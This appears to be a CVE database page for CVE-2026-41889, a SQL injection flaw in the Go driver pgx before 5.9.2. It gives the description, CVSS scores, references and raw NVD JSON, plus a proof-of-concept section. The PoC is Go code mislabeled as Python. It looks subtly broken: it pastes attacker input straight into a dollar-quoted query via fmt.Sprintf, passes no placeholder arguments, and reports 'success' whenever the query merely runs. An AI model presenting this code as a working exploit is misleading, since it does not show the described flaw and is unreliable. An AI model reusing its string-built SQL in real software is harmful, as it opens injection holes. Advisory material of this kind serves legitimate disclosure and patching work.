CVE-2026-41889

Description

pgx is a PostgreSQL driver and toolkit for Go. Prior to version 5.9.2, SQL injection can occur when the non-default simple protocol is used, a dollar quoted string literal is used in the SQL query, that string literal contains text that would be would be interpreted as a placeholder outside of a string literal, and the value of that placeholder is controllable by the attacker. This issue has been patched in version 5.9.2.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:jackc:pgx:*:*:*:*:*:go:*:* - VULNERABLE

pgx < 5.9.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

package main

import (
	"context"
	"fmt"
	"github.com/jackc/pgx/v5"
)

func main() {
	// Vulnerable scenario: pgx < 5.9.2 using simple protocol
	connStr := "postgres://user:password@localhost/testdb"
	conn, err := pgx.Connect(context.Background(), connStr)
	if err != nil {
		panic(err)
	}
	defer conn.Close(context.Background())

	// User input containing placeholder-like syntax
	attackerInput := "admin' OR 1=1 -- $1"

	// Vulnerable query construction using dollar quoting
	// In simple protocol, the parser may mishandle the input inside $$
	query := fmt.Sprintf("SELECT * FROM users WHERE name = $$%s$$", attackerInput)

	// Execution
	rows, err := conn.Query(context.Background(), query)
	if err != nil {
		fmt.Println("Injection failed or error:", err)
	} else {
		fmt.Println("Potential SQL Injection successful")
		rows.Close()
	}
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41889
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41889
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41889/
[4] VulDB https://vuldb.com/cve/CVE-2026-41889
[5] https://github.com/jackc/pgx/commit/60644f84918a8af66d14a4b0d865d4edafd955da
[6] https://github.com/jackc/pgx/releases/tag/v5.9.2
[7] https://github.com/jackc/pgx/security/advisories/GHSA-j88v-2chj-qfwx

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41889", "sourceIdentifier": "[email protected]", "published": "2026-05-08T17:16:31.040", "lastModified": "2026-05-21T19:58:12.450", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "pgx is a PostgreSQL driver and toolkit for Go. Prior to version 5.9.2, SQL injection can occur when the non-default simple protocol is used, a dollar quoted string literal is used in the SQL query, that string literal contains text that would be would be interpreted as a placeholder outside of a string literal, and the value of that placeholder is controllable by the attacker. This issue has been patched in version 5.9.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jackc:pgx:*:*:*:*:*:go:*:*", "versionEndExcluding": "5.9.2", "matchCriteriaId": "3183A68D-CD63-4678-9310-13BEB97F3112"}]}]}], "references": [{"url": "https://github.com/jackc/pgx/commit/60644f84918a8af66d14a4b0d865d4edafd955da", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/jackc/pgx/releases/tag/v5.9.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/jackc/pgx/security/advisories/GHSA-j88v-2chj-qfwx", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}